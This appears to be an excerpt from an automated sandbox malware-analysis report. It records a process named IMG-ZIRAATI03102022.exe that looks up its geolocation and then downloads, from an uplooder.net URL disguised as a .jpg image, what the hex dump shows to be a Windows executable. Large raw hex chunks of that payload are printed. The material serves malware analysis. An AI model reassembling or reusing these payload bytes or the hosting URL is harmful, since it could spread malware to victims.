69 6f 6e 41 63 63 75 72 61 63 79 52 61 64 69 75 73 22 3a 22 35 30 30 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 5c 2f 4e 65 77 5f 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 75 72 72 65 6e 63 79 43 6f 64 65 22 3a 22 55 53 44 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 75 72 72 65 6e 63 79 53 79 6d 62 6f 6c 22 3a 22 24 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 75 72 72 65 6e 63 79 53 79 6d 62 6f 6c 5f 55 54 46 38 22 3a 22 24 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 75 72 72 65 6e 63 79 43 6f 6e 76 65 72 74 65 72 22 3a 30 0a 7d
                                                                                                                            Data Ascii: { "geoplugin_request":"102.129.143.15", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite data created by MaxMind, available from <a href='http:\/\/www.maxmind.com'>http:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"Reston", "geoplugin_region":"Virginia", "geoplugin_regionCode":"VA", "geoplugin_regionName":"Virginia", "geoplugin_areaCode":"", "geoplugin_dmaCode":"511", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"38.9609", "geoplugin_longitude":"-77.3429", "geoplugin_locationAccuracyRadius":"500", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                                                                                                            HTTPS Proxied Packets

                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                            0192.168.2.349698144.76.120.25443C:\Users\user\Desktop\IMG-ZIRAATI03102022.exe
                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                            2022-10-03 14:01:58 UTC0OUTGET /img/image/57/b15c1f2fa18efb7b0a2e9e577171ed5d/IMG-ZIRAATI03102022-Wqnntgku.jpg HTTP/1.1
                                                                                                                            Host: www.uplooder.net
                                                                                                                            Connection: Keep-Alive
                                                                                                                            2022-10-03 14:01:58 UTC0INHTTP/1.1 200 OK
                                                                                                                            Server: nginx/1.21.4
                                                                                                                            Date: Mon, 03 Oct 2022 14:01:58 GMT
                                                                                                                            Content-Type: image/jpeg
                                                                                                                            Content-Length: 1857536
                                                                                                                            Connection: close
                                                                                                                            Last-Modified: Mon, 03 Oct 2022 10:48:24 GMT
                                                                                                                            ETag: "1c5800-5ea1f1538ceae"
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2022-10-03 14:01:58 UTC0INData Raw: 34 44 35 41 39 30 30 30 30 33 30 30 30 30 30 30 30 34 30 30 30 30 30 30 46 46 46 46 30 30 30 30 42 38 30 30 30 30 30 30 30 30 30 30 30 30 30 30 34 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 38 30 30 30 30 30 30 30 30 45 31 46 42 41 30 45 30 30 42 34 30 39 43 44 32 31 42 38 30 31 34 43 43 44 32 31 35 34 36 38 36 39 37 33 32 30 37 30 37 32 36 46 36 37 37 32 36 31 36 44 32 30 36 33 36 31 36 45 36 45 36 46 37 34 32 30 36 32 36 35 32 30 37 32 37 35 36 45 32 30 36 39 36 45 32 30 34 34 34 46 35 33 32 30 36 44 36 46 36 34 36 35 32 45 30 44 30 44 30 41 32 34 30 30 30 30 30 30 30 30 30 30 30 30 30
                                                                                                                            Data Ascii: 4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000800000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A240000000000000
                                                                                                                            2022-10-03 14:01:58 UTC16INData Raw: 32 38 36 46 30 30 30 30 30 36 30 41 30 32 32 38 36 46 30 30 30 30 30 36 30 42 30 32 30 37 30 36 30 33 30 34 32 38 35 44 30 30 30 30 30 36 32 38 35 31 30 31 30 30 30 36 32 41 30 30 30 30 32 32 30 32 30 33 36 46 35 31 30 31 30 30 30 36 32 41 30 30 30 30 30 30 32 45 37 32 37 33 30 30 30 30 37 30 37 33 36 46 30 30 30 30 30 41 37 41 31 42 33 30 30 46 30 30 37 44 30 30 30 30 30 30 31 44 30 30 30 30 31 31 44 30 32 43 30 30 30 30 30 31 32 38 35 36 30 30 30 30 30 41 37 32 41 42 30 30 30 30 37 30 31 46 32 34 31 34 37 45 37 30 30 30 30 30 30 41 31 34 32 38 37 31 30 30 30 30 30 41 30 41 30 36 32 43 30 42 30 36 30 32 31 34 36 46 37 32 30 30 30 30 30 41 32 36 44 45 35 30 44 45 30 33 32 36 44 45 30 30 30 30 30 32 36 46 37 33 30 30 30 30 30 41 30 42 30 37 36 46 37 34 30
                                                                                                                            Data Ascii: 286F0000060A02286F0000060B0207060304285D00000628510100062A00002202036F510100062A0000002E7273000070736F00000A7A1B300F007D0000001D000011D02C000001285600000A72AB0000701F24147E7000000A14287100000A0A062C0B0602146F7200000A26DE50DE0326DE0000026F7300000A0B076F740
                                                                                                                            2022-10-03 14:01:58 UTC32INData Raw: 30 32 30 30 30 34 30 41 31 32 30 30 32 38 42 37 30 35 30 30 30 36 30 32 37 42 31 31 30 32 30 30 30 34 31 34 46 45 30 36 38 32 30 31 30 30 30 36 37 33 32 41 30 32 30 30 30 36 37 33 42 39 30 31 30 30 30 36 36 46 39 44 30 30 30 30 30 41 32 35 30 32 37 42 39 31 30 31 30 30 30 34 30 41 31 32 30 30 32 38 42 37 30 35 30 30 30 36 30 32 37 42 39 31 30 31 30 30 30 34 31 34 46 45 30 36 38 42 30 31 30 30 30 36 37 33 32 41 30 32 30 30 30 36 37 33 42 39 30 31 30 30 30 36 36 46 39 44 30 30 30 30 30 41 32 35 30 32 37 42 44 41 30 31 30 30 30 34 30 41 31 32 30 30 32 38 42 37 30 35 30 30 30 36 30 32 37 42 44 41 30 31 30 30 30 34 31 34 46 45 30 36 34 30 30 31 30 30 30 36 37 33 32 41 30 32 30 30 30 36 37 33 42 39 30 31 30 30 30 36 36 46 39 44 30 30 30 30 30 41 32 35 30 32 37
                                                                                                                            Data Ascii: 0200040A120028B7050006027B1102000414FE0682010006732A02000673B90100066F9D00000A25027B910100040A120028B7050006027B9101000414FE068B010006732A02000673B90100066F9D00000A25027BDA0100040A120028B7050006027BDA01000414FE0640010006732A02000673B90100066F9D00000A25027
                                                                                                                            2022-10-03 14:01:58 UTC48INData Raw: 46 38 30 32 30 30 30 30 30 33 36 46 44 45 30 35 30 30 30 36 31 44 33 33 32 33 30 33 36 46 44 43 30 35 30 30 30 36 32 44 31 42 30 32 37 34 31 43 30 31 30 30 30 32 36 46 37 45 30 36 30 30 30 36 37 45 39 46 30 30 30 30 30 41 32 38 41 30 30 30 30 30 30 41 30 41 33 38 43 43 30 32 30 30 30 30 30 33 36 46 44 45 30 35 30 30 30 36 31 46 30 46 33 33 32 36 30 32 37 34 31 43 30 31 30 30 30 32 36 46 37 45 30 36 30 30 30 36 30 33 37 34 42 37 30 30 30 30 30 32 36 46 39 46 30 34 30 30 30 36 37 33 39 39 30 30 30 30 30 41 32 38 41 30 30 30 30 30 30 41 30 41 33 38 39 43 30 32 30 30 30 30 30 33 36 46 44 45 30 35 30 30 30 36 31 46 31 41 33 33 32 36 30 32 37 34 31 43 30 31 30 30 30 32 36 46 37 45 30 36 30 30 30 36 30 33 37 34 33 45 30 31 30 30 30 32 36 46 45 35 30 36 30 30 30
                                                                                                                            Data Ascii: F8020000036FDE0500061D3323036FDC0500062D1B02741C0100026F7E0600067E9F00000A28A000000A0A38CC020000036FDE0500061F0F332602741C0100026F7E0600060374B70000026F9F040006739900000A28A000000A0A389C020000036FDE0500061F1A332602741C0100026F7E06000603743E0100026FE506000
                                                                                                                            2022-10-03 14:01:58 UTC64INData Raw: 32 38 36 43 30 30 30 30 30 41 31 33 30 39 37 33 39 44 30 34 30 30 30 36 32 35 30 36 31 31 30 39 35 46 36 46 41 30 30 34 30 30 30 36 32 41 30 33 36 46 44 45 30 35 30 30 30 36 31 46 31 41 33 33 36 31 30 34 36 46 44 45 30 35 30 30 30 36 31 46 31 41 33 33 32 42 30 33 37 34 33 45 30 31 30 30 30 32 36 46 45 35 30 36 30 30 30 36 31 33 30 41 30 34 37 34 33 45 30 31 30 30 30 32 36 46 45 35 30 36 30 30 30 36 31 33 30 42 37 33 45 33 30 36 30 30 30 36 32 35 31 31 30 41 31 31 30 42 35 46 36 46 45 36 30 36 30 30 30 36 32 41 30 34 36 46 44 45 30 35 30 30 30 36 31 46 30 41 33 33 32 32 30 33 37 34 42 37 30 30 30 30 30 32 36 46 39 46 30 34 30 30 30 36 30 34 36 46 44 43 30 35 30 30 30 36 32 38 36 42 30 30 30 30 30 41 31 33 30 43 36 41 31 31 30 43 35 46 37 33 45 34 30 36 30
                                                                                                                            Data Ascii: 286C00000A1309739D040006250611095F6FA00400062A036FDE0500061F1A3361046FDE0500061F1A332B03743E0100026FE5060006130A04743E0100026FE5060006130B73E306000625110A110B5F6FE60600062A046FDE0500061F0A33220374B70000026F9F040006046FDC050006286B00000A130C6A110C5F73E4060
                                                                                                                            2022-10-03 14:01:58 UTC80INData Raw: 30 36 42 41 38 35 32 38 39 41 30 30 30 30 30 41 32 42 33 35 31 32 30 32 30 36 37 34 33 38 30 31 30 30 30 32 36 46 44 34 30 36 30 30 30 36 32 38 35 31 30 30 30 30 30 41 38 35 32 38 39 41 30 30 30 30 30 41 32 42 31 42 31 32 30 32 30 36 37 34 35 45 30 30 30 30 30 32 36 46 38 32 30 32 30 30 30 36 42 39 32 38 39 41 30 30 30 30 30 41 32 42 30 36 37 33 36 30 30 30 30 30 30 41 37 41 30 32 37 33 37 44 30 36 30 30 30 36 32 35 30 38 36 46 37 46 30 36 30 30 30 36 36 46 35 31 30 31 30 30 30 36 32 41 30 30 31 33 33 30 32 35 30 30 30 42 30 32 30 30 30 30 36 39 30 30 30 30 31 31 31 36 30 41 30 32 36 46 44 45 30 35 30 30 30 36 30 42 30 37 31 44 35 39 34 35 30 39 30 30 30 30 30 30 32 42 30 31 30 30 30 30 43 32 30 31 30 30 30 30 43 32 30 31 30 30 30 30 37 46 30 31 30 30 30
                                                                                                                            Data Ascii: 06BA85289A00000A2B3512020674380100026FD4060006285100000A85289A00000A2B1B120206745E0000026F82020006B9289A00000A2B06736000000A7A02737D06000625086F7F0600066F510100062A00133025000B02000069000011160A026FDE0500060B071D5945090000002B010000C2010000C20100007F01000
                                                                                                                            2022-10-03 14:01:58 UTC96INData Raw: 30 36 30 41 30 32 36 46 36 46 30 30 30 30 30 36 30 42 30 37 36 46 44 45 30 35 30 30 30 36 31 46 30 42 33 33 30 44 30 37 30 36 32 38 34 44 30 31 30 30 30 36 31 36 46 45 30 31 30 43 32 42 30 42 30 37 30 36 32 38 35 30 30 31 30 30 30 36 31 36 46 45 30 31 30 43 30 38 32 43 31 33 30 33 37 34 31 41 30 31 30 30 30 32 36 46 36 43 30 36 30 30 30 36 30 44 30 32 30 39 36 46 37 31 30 31 30 30 30 36 32 41 30 30 30 36 32 41 30 30 30 30 38 41 30 33 36 46 39 33 30 30 30 30 30 41 32 44 30 44 30 33 32 38 31 32 30 37 30 30 30 36 36 46 36 38 30 30 30 30 30 41 32 43 30 43 30 32 37 45 45 30 30 30 30 30 30 41 30 33 36 46 43 31 30 30 30 30 30 41 32 41 30 30 31 33 33 30 30 44 30 30 42 42 30 30 30 30 30 30 34 44 30 30 30 30 31 31 30 32 36 46 36 46 30 30 30 30 30 36 30 41 30 36 36
                                                                                                                            Data Ascii: 060A026F6F0000060B076FDE0500061F0B330D0706284D01000616FE010C2B0B0706285001000616FE010C082C1303741A0100026F6C0600060D02096F710100062A00062A00008A036F9300000A2D0D0328120700066F6800000A2C0C027EE000000A036FC100000A2A0013300D00BB0000004D000011026F6F0000060A066
                                                                                                                            2022-10-03 14:01:58 UTC112INData Raw: 30 36 31 36 30 41 31 36 30 42 30 39 31 37 35 38 30 44 30 39 31 31 30 36 36 46 37 44 30 31 30 30 30 41 33 32 39 43 30 36 31 37 33 33 30 36 37 33 46 33 30 30 30 30 30 41 37 41 30 36 31 37 33 31 32 38 30 36 31 33 30 35 32 42 31 34 30 37 31 46 35 34 37 45 32 33 30 31 30 30 30 34 31 31 30 35 39 35 44 39 44 37 30 42 31 31 30 35 31 37 35 38 31 33 30 35 31 31 30 35 31 42 33 32 45 37 30 38 30 37 31 42 30 36 35 39 32 38 37 44 30 32 30 30 30 36 30 38 36 46 38 30 30 31 30 30 30 41 31 33 30 37 44 45 30 37 30 38 36 46 30 36 30 30 30 30 30 41 44 43 31 31 30 37 32 41 30 30 30 30 30 31 31 30 30 30 30 30 30 32 30 30 31 39 30 30 41 46 43 38 30 30 30 37 30 30 30 30 30 30 30 30 45 32 30 32 30 33 31 46 31 38 36 34 44 32 36 46 38 31 30 31 30 30 30 41 30 34 31 39 33 33 30 31 32
                                                                                                                            Data Ascii: 06160A160B0917580D0911066F7D01000A329C0617330673F300000A7A061731280613052B14071F547E23010004110595D9D70B11051758130511051B32E708071B0659287D020006086F8001000A1307DE07086F0600000ADC11072A00000110000002001900AFC8000700000000E202031F1864D26F8101000A041933012
                                                                                                                            2022-10-03 14:01:58 UTC128INData Raw: 30 30 30 30 30 41 30 32 31 41 38 44 31 31 30 30 30 30 30 31 37 44 36 41 30 32 30 30 30 34 30 32 32 38 31 46 30 33 30 30 30 36 32 41 30 30 36 45 30 32 31 46 35 30 38 44 42 31 30 30 30 30 30 31 37 44 37 32 30 32 30 30 30 34 30 32 32 38 31 41 30 30 30 30 30 41 30 32 30 33 32 38 31 41 30 33 30 30 30 36 32 41 31 33 33 30 30 35 30 30 34 44 30 30 30 30 30 30 30 32 30 30 30 30 31 31 30 32 37 42 36 41 30 32 30 30 30 34 30 32 30 32 37 42 36 42 30 32 30 30 30 34 30 41 30 36 31 37 35 38 37 44 36 42 30 32 30 30 30 34 30 36 30 33 39 43 30 32 37 42 36 42 30 32 30 30 30 34 30 32 37 42 36 41 30 32 30 30 30 34 38 45 36 39 33 33 31 34 30 32 30 32 37 42 36 41 30 32 30 30 30 34 31 36 32 38 31 43 30 33 30 30 30 36 30 32 31 36 37 44 36 42 30 32 30 30 30 34 30 32 30 32 37 42 36
                                                                                                                            Data Ascii: 00000A021A8D110000017D6A02000402281F0300062A006E021F508DB10000017D7202000402281A00000A0203281A0300062A133005004D00000002000011027B6A02000402027B6B0200040A0617587D6B02000406039C027B6B020004027B6A0200048E69331402027B6A02000416281C03000602167D6B02000402027B6
                                                                                                                            2022-10-03 14:01:58 UTC144INData Raw: 30 39 39 34 36 45 31 33 30 42 31 31 30 42 31 31 30 42 35 41 31 33 31 30 31 31 30 38 30 34 30 39 39 34 36 45 35 41 31 33 31 31 30 36 31 31 31 30 31 35 36 45 35 46 31 31 31 31 36 44 36 45 35 38 30 32 30 39 31 37 35 38 39 34 36 45 35 38 35 38 30 41 30 32 30 39 31 38 35 38 30 36 36 39 39 45 30 36 31 46 32 30 36 34 31 31 31 30 31 46 32 30 36 34 35 38 31 31 31 31 31 46 32 30 36 34 35 38 30 41 30 39 31 37 35 39 31 33 30 34 32 42 34 41 31 31 30 42 30 33 31 31 30 34 39 34 36 45 35 41 31 33 31 32 31 31 30 38 30 34 31 31 30 34 39 34 36 45 35 41 31 33 31 33 30 36 31 31 31 33 31 35 36 45 35 46 31 31 31 32 36 44 31 37 36 32 36 45 35 38 30 32 31 31 30 34 31 37 35 38 39 34 36 45 35 38 35 38 30 41 30 32 31 31 30 34 31 38 35 38 30 36 36 39 39 45 30 36 31 46 32 30 36 34 31
                                                                                                                            Data Ascii: 09946E130B110B110B5A131011080409946E5A1311061110156E5F11116D6E5802091758946E58580A0209185806699E061F206411101F20645811111F2064580A09175913042B4A110B031104946E5A13121108041104946E5A1313061113156E5F11126D17626E580211041758946E58580A021104185806699E061F20641
                                                                                                                            2022-10-03 14:01:58 UTC160INData Raw: 30 30 30 30 43 34 30 30 30 30 30 30 35 45 30 31 30 30 30 30 37 38 30 30 30 30 30 30 41 39 30 30 30 30 30 30 32 33 30 31 30 30 30 30 35 45 30 31 30 30 30 30 35 45 30 31 30 30 30 30 46 37 30 30 30 30 30 30 34 43 30 30 30 30 30 30 35 45 30 31 30 30 30 30 33 37 30 31 30 30 30 30 36 32 30 30 30 30 30 30 30 35 30 30 30 30 30 30 33 36 30 30 30 30 30 30 34 42 30 31 30 30 30 30 44 46 30 30 30 30 30 30 32 30 30 30 30 30 30 30 30 46 30 31 30 30 30 30 35 45 30 31 30 30 30 30 38 45 30 30 30 30 30 30 33 38 35 39 30 31 30 30 30 30 30 32 30 33 37 34 37 34 30 30 30 30 30 32 36 46 32 45 30 33 30 30 30 36 32 38 34 36 30 30 30 30 30 41 32 38 41 30 30 34 30 30 30 36 33 38 34 34 30 31 30 30 30 30 30 32 30 33 37 34 30 42 30 31 30 30 30 32 36 46 33 33 30 36 30 30 30 36 32 38 41
                                                                                                                            Data Ascii: 0000C40000005E01000078000000A9000000230100005E0100005E010000F70000004C0000005E010000370100006200000005000000360000004B010000DF000000200000000F0100005E0100008E0000003859010000020374740000026F2E030006284600000A28A004000638440100000203740B0100026F3306000628A
                                                                                                                            2022-10-03 14:01:58 UTC176INData Raw: 30 37 35 38 30 32 37 42 33 33 30 33 30 30 30 34 30 32 37 42 33 35 30 33 30 30 30 34 30 37 35 38 39 31 39 43 30 37 31 37 35 39 32 35 30 42 31 36 32 46 45 34 32 42 31 34 30 32 37 42 33 33 30 33 30 30 30 34 30 32 37 42 33 35 30 33 30 30 30 34 30 33 30 34 30 36 32 38 31 45 30 30 30 30 30 41 30 32 30 32 37 42 33 35 30 33 30 30 30 34 30 36 35 38 37 44 33 35 30 33 30 30 30 34 30 36 32 41 30 30 30 30 30 30 31 33 33 30 30 34 30 30 33 37 30 30 30 30 30 30 30 32 30 30 30 30 31 31 30 32 37 42 33 41 30 33 30 30 30 34 32 44 30 36 37 33 46 33 30 30 30 30 30 41 37 41 30 32 37 42 33 35 30 33 30 30 30 34 30 32 37 42 33 36 30 33 30 30 30 34 33 32 30 32 31 35 32 41 30 32 37 42 33 33 30 33 30 30 30 34 30 32 30 32 37 42 33 35 30 33 30 30 30 34 30 41 30 36 31 37 35 38 37 44 33
                                                                                                                            Data Ascii: 0758027B33030004027B350300040758919C071759250B162FE42B14027B33030004027B35030004030406281E00000A02027B3503000406587D35030004062A000000133004003700000002000011027B3A0300042D0673F300000A7A027B35030004027B360300043202152A027B3303000402027B350300040A0617587D3
                                                                                                                            2022-10-03 14:01:58 UTC192INData Raw: 35 38 32 41 30 32 37 42 36 45 30 33 30 30 30 34 36 46 37 32 30 31 30 30 30 41 36 39 30 37 35 39 31 33 30 34 30 32 37 42 37 32 30 33 30 30 30 34 31 31 30 34 30 33 30 39 30 35 30 37 35 38 31 32 30 32 36 46 32 33 30 30 30 30 30 36 32 43 31 33 30 32 37 42 36 45 30 33 30 30 30 34 30 38 30 37 35 39 36 41 31 37 36 46 37 37 30 31 30 30 30 41 32 36 30 38 32 41 30 32 37 42 36 45 30 33 30 30 30 34 30 33 30 34 30 35 36 46 37 35 30 31 30 30 30 41 30 43 30 38 32 43 31 36 30 32 37 42 37 32 30 33 30 30 30 34 31 31 30 34 30 33 30 39 30 38 30 37 35 38 30 38 30 35 46 45 30 34 36 46 32 32 30 30 30 30 30 36 30 38 30 37 35 38 32 41 30 32 30 35 32 38 31 42 30 36 30 30 30 36 30 32 30 33 30 34 30 35 32 38 31 41 30 36 30 30 30 36 30 41 30 36 30 37 35 38 32 41 30 30 30 30 30 30 31
                                                                                                                            Data Ascii: 582A027B6E0300046F7201000A6907591304027B720300041104030905075812026F230000062C13027B6E0300040807596A176F7701000A26082A027B6E0300040304056F7501000A0C082C16027B72030004110403090807580805FE046F220000060807582A0205281B06000602030405281A0600060A0607582A0000001
                                                                                                                            2022-10-03 14:01:58 UTC208INData Raw: 33 30 30 35 30 30 31 43 30 30 30 30 30 30 45 46 30 30 30 30 31 31 30 32 32 38 33 37 30 30 30 30 30 41 30 41 31 32 30 30 31 37 36 41 32 38 31 32 30 32 30 30 30 41 37 44 43 46 30 35 30 30 30 34 30 32 32 38 31 41 30 30 30 30 30 41 32 41 31 45 30 32 32 38 31 41 30 30 30 30 30 41 32 41 35 41 32 38 43 30 30 35 30 30 30 36 32 38 43 32 30 35 30 30 30 36 37 32 36 43 31 43 30 30 37 30 31 34 32 38 35 45 30 30 30 30 30 36 32 41 30 30 32 36 30 32 31 46 31 41 32 38 44 41 30 35 30 30 30 36 32 41 30 30 30 30 33 41 30 32 32 38 45 33 30 36 30 30 30 36 30 32 30 33 37 44 44 30 30 35 30 30 30 34 32 41 30 30 31 45 30 32 37 42 44 30 30 35 30 30 30 34 32 41 32 32 30 32 30 33 37 44 44 30 30 35 30 30 30 34 32 41 30 30 30 30 30 30 33 32 30 32 32 38 45 35 30 36 30 30 30 36 38 43 33
                                                                                                                            Data Ascii: 3005001C000000EF00001102283700000A0A1200176A281202000A7DCF05000402281A00000A2A1E02281A00000A2A5A28C005000628C2050006726C1C007014285E0000062A0026021F1A28DA0500062A00003A0228E306000602037DD00500042A001E027BD00500042A2202037DD00500042A000000320228E50600068C3
                                                                                                                            2022-10-03 14:01:58 UTC224INData Raw: 35 41 34 33 35 32 30 37 46 31 42 43 30 35 42 39 31 39 37 32 36 43 39 32 38 34 45 39 32 37 34 43 39 39 32 34 34 33 30 39 37 42 44 35 38 35 38 43 30 37 44 43 31 43 44 46 43 33 37 46 44 35 37 46 43 31 37 42 43 32 30 31 35 41 38 43 41 42 31 37 46 41 31 37 46 34 44 46 36 34 45 46 35 31 42 44 32 46 42 43 32 46 42 43 42 42 37 39 41 46 31 43 43 31 34 37 42 44 41 42 37 41 44 35 45 44 44 44 42 32 34 37 43 42 43 42 34 34 45 30 44 39 42 43 35 33 42 43 31 33 39 32 45 45 35 36 37 46 41 41 30 34 44 39 31 41 45 32 36 34 32 36 46 31 44 32 31 45 36 35 30 42 39 32 43 43 42 41 36 35 39 33 43 38 32 37 39 34 44 35 37 45 43 34 44 42 31 32 45 44 30 34 38 34 44 31 30 39 45 32 37 35 31 37 32 38 39 44 37 31 32 32 45 32 37 39 43 34 36 46 43 38 33 30 36 34 45 45 42 44 44 44 42 42 42
                                                                                                                            Data Ascii: 5A435207F1BC05B919726C9284E9274C992443097BD5858C07DC1CDFC37FD57FC17BC2015A8CAB17FA17F4DF64EF51BD2FBC2FBCBB79AF1CC147BDAB7AD5EDDDB247CBCB44E0D9BC53BC1392EE567FAA04D91AE26426F1D21E650B92CCBA6593C82794D57EC4DB12ED0484D109E27517289D7122E279C46FC83064EEBDDDBBB
                                                                                                                            2022-10-03 14:01:58 UTC240INData Raw: 46 35 46 30 45 35 44 46 33 42 31 45 33 46 34 36 43 46 44 39 45 41 45 31 46 43 45 44 36 43 42 38 45 39 44 36 33 46 30 31 38 44 34 37 36 38 44 33 45 45 43 46 39 45 39 33 39 45 41 44 36 44 32 35 46 39 46 33 35 39 32 35 39 42 45 43 43 39 35 31 37 39 30 44 37 37 32 37 37 37 43 34 36 43 46 30 33 38 44 45 33 30 44 41 46 33 44 46 31 46 35 35 46 45 32 37 42 33 34 43 36 35 35 36 45 44 35 36 42 41 31 38 31 38 41 45 45 46 31 37 32 34 35 46 38 42 32 39 44 37 46 42 41 36 41 30 37 34 42 46 30 44 31 46 44 33 46 44 46 33 31 33 46 32 46 44 33 46 35 45 34 42 32 39 38 36 34 41 38 37 35 45 46 35 43 31 42 44 44 44 45 43 35 33 39 36 42 37 38 37 35 36 38 39 37 46 36 38 33 43 36 44 42 37 45 46 38 42 42 32 38 38 46 44 35 41 45 34 33 46 44 32 46 44 32 37 33 44 30 46 46 44 45 36 46
                                                                                                                            Data Ascii: F5F0E5DF3B1E3F46CFD9EAE1FCED6CB8E9D63F018D4768D3EECF9E939EAD6D25F9F359259BECC951790D772777C46CF038DE30DAF3DF1F55FE27B34C6556ED56BA1818AEEF17245F8B29D7FBA6A074BF0D1FD3FDF313F2FD3F5E4B29864A875EF5C1BDDDEC5396B78756897F683C6DB7EF8BB288FD5AE43FD2FD273D0FFDE6F
                                                                                                                            2022-10-03 14:01:58 UTC256INData Raw: 31 42 35 44 44 41 33 43 46 46 32 43 41 45 31 33 35 41 44 30 35 32 39 39 32 34 42 35 36 45 39 34 39 31 45 44 36 39 30 30 35 33 33 34 46 46 35 34 37 42 37 32 46 42 31 30 37 45 35 38 31 46 38 31 34 32 35 39 34 43 36 44 31 32 42 39 38 32 34 35 39 43 31 34 43 30 33 43 44 32 33 42 46 42 30 36 41 30 42 42 31 45 34 38 43 33 46 32 42 37 34 39 36 46 42 34 31 34 45 36 32 31 32 45 44 34 30 36 42 36 34 45 33 36 32 39 45 44 45 43 35 42 45 33 43 32 44 39 36 33 33 38 43 43 31 45 32 33 46 41 35 41 43 34 42 34 46 37 33 33 30 46 38 44 38 44 34 42 30 42 37 33 41 34 42 34 37 31 37 43 42 39 36 44 34 42 30 39 37 33 43 37 45 43 36 31 46 35 33 32 36 45 31 36 45 38 39 38 39 34 33 34 45 36 45 31 34 41 30 34 38 42 37 30 42 33 43 45 35 30 41 30 41 37 33 36 34 39 36 34 43 41 33 44 44
                                                                                                                            Data Ascii: 1B5DDA3CFF2CAE135AD0529924B56E9491ED69005334FF547B72FB107E581F8142594C6D12B982459C14C03CD23BFB06A0BB1E48C3F2B7496FB414E6212ED406B64E3629EDEC5BE3C2D96338CC1E23FA5AC4B4F7330F8D8D4B0B73A4B4717CB96D4B0973C7EC61F5326E16E8989434E6E14A048B70B3CE50A0A7364964CA3DD
                                                                                                                            2022-10-03 14:01:58 UTC272INData Raw: 46 37 43 39 31 30 31 46 30 39 32 36 43 33 35 33 44 42 34 43 33 36 39 43 43 44 36 46 42 41 39 35 31 37 35 46 33 44 35 35 44 37 45 36 45 35 31 42 39 45 32 44 30 36 37 39 30 42 32 35 32 36 33 39 37 42 44 37 32 30 43 33 45 33 42 36 36 46 31 31 45 39 42 38 36 42 37 35 42 39 35 42 31 37 36 38 44 45 34 38 31 45 44 37 42 42 35 37 37 42 44 33 30 42 35 42 45 41 35 30 30 43 42 41 46 42 35 41 35 37 36 33 45 46 36 42 39 41 44 30 44 31 42 33 42 32 42 41 37 30 37 34 43 37 42 38 45 31 43 44 45 37 46 42 45 45 42 35 37 39 42 44 45 30 45 33 43 32 36 30 42 46 33 42 42 32 34 43 41 46 36 32 46 30 31 44 37 41 39 42 32 45 43 46 43 35 45 39 37 32 36 33 44 42 32 37 33 37 37 30 37 30 38 37 42 31 33 41 31 30 31 46 38 43 34 35 45 38 35 32 31 46 30 36 44 36 39 42 37 35 46 37 43 36 39
                                                                                                                            Data Ascii: F7C9101F0926C353DB4C369CCD6FBA95175F3D55D7E6E51B9E2D06790B2526397BD720C3E3B66F11E9B86B75B95B1768DE481ED7BB577BD30B5BEA500CBAFB5A5763EF6B9AD0D1B3B2BA7074C7B8E1CDE7FBEEB579BDE0E3C260BF3BB24CAF62F01D7A9B2ECFC5E97263DB2737707087B13A101F8C45E8521F06D69B75F7C69
                                                                                                                            2022-10-03 14:01:58 UTC288INData Raw: 42 35 30 32 31 45 44 34 41 39 38 36 41 30 41 44 46 37 45 46 32 39 31 41 38 44 39 33 31 44 41 38 31 46 44 36 41 36 44 37 36 41 38 37 30 34 46 37 41 38 32 35 46 31 42 45 44 46 35 37 38 35 38 46 34 37 31 35 42 45 38 46 34 46 45 44 44 37 31 46 46 42 45 44 35 44 42 41 36 38 45 45 34 34 37 41 33 32 31 44 35 42 36 41 38 36 36 44 45 39 42 44 31 32 46 42 37 43 41 33 39 46 46 37 30 39 37 43 30 45 36 31 41 46 35 41 39 42 35 43 33 37 31 34 36 33 42 35 42 44 41 41 33 42 46 34 30 39 37 32 31 38 46 34 42 31 34 43 34 37 35 38 41 38 41 39 44 31 45 39 41 33 46 44 44 45 44 30 38 38 35 44 46 34 46 31 30 32 44 41 33 46 44 39 32 38 46 34 31 45 31 32 46 42 31 39 41 33 44 30 38 36 33 32 36 33 46 35 31 41 35 41 32 46 38 30 33 36 41 38 45 45 35 31 44 41 44 31 30 45 35 41 32 46 41
                                                                                                                            Data Ascii: B5021ED4A986A0ADF7EF291A8D931DA81FD6A6D76A8704F7A825F1BEDF57858F4715BE8F4FEDD71FFBED5DBA68EE447A321D5B6A866DE9BD12FB7CA39FF7097C0E61AF5A9B5C371463B5BDAA3BF4097218F4B14C4758A8A9D1E9A3FDDED0885DF4F102DA3FD928F41E12FB19A3D0863263F51A5A2F8036A8EE51DAD10E5A2FA
